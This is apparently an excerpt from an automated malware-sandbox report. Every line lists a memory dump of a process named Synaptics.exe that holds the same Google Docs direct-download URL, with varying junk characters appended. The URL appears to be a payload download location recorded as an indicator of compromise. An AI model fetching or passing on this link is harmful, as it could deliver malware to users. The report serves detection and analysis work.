Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX$
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXP
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXa
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXh
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYD
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYe
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ5H8D
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005337000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZFW.L
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1738664470.0000000005337000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_3U:
Source: Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_W
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_g
Source: Synaptics.exe, 00000003.00000002.1738664470.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_v
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1738664470.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaD
Source: Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadampprfV
Source: Synaptics.exe, 00000003.00000002.1738664470.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadap
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbc
Source: Synaptics.exe, 00000003.00000002.1738664470.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbox-fin;o$
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005337000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduser3
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc3
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcg
Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1738664470.0000000005333000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn
Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.com
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005337000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom
Source: Synaptics.exe, 00000003.00000002.1771384181.000000000E192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd)
Source: Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd:url
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
Source: Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade-wra
Source: Synaptics.exe, 00000003.00000002.1738664470.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.Vt
Source: Synaptics.exe, 00000003.00000002.1738664470.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.com
Source: Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.nl
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeE
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeb
Source: Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadepeat
Source: Synaptics.exe, 00000003.00000002.1738664470.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadesyndGi
Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf2
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadff
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005337000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg:0
Source: Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1738664470.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgoogl
Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgpBC
Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgszB
Source: Synaptics.exe, 00000003.00000002.1771384181.000000000E192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh3
Source: Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhW
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhg
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhr
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi6
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiF
Source: Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadial-s
Source: Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadic-cGV
Source: Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadight
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005337000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloading
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005333000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjK
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjb
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk2
Source: Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkecnLV
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkf
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005333000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadki7
Source: Synaptics.exe, 00000003.00000002.1771384181.000000000E192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1738664470.0000000005337000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadli
Source: Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadls.d
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm7
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmG
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1738664470.0000000005333000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.
Source: Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.co
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn5
Source: Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnalytkV
Source: Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadng:30
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnitiaSa
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005333000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadny
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado-rep
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado?
Source: Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadody
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005333000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogS
Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogn
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005337000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadok
Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadooRB
Source: Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogl
Source: Synaptics.exe, 00000003.00000002.1738664470.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle
Source: Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogleU
Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoor
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadound:
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadovd
Source: Synaptics.exe, 00000003.00000002.1771384181.000000000E192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp-Alivew
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp/
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpM
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpb
Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadps
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpx
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq2
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq7
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqG
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqf
Source: Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
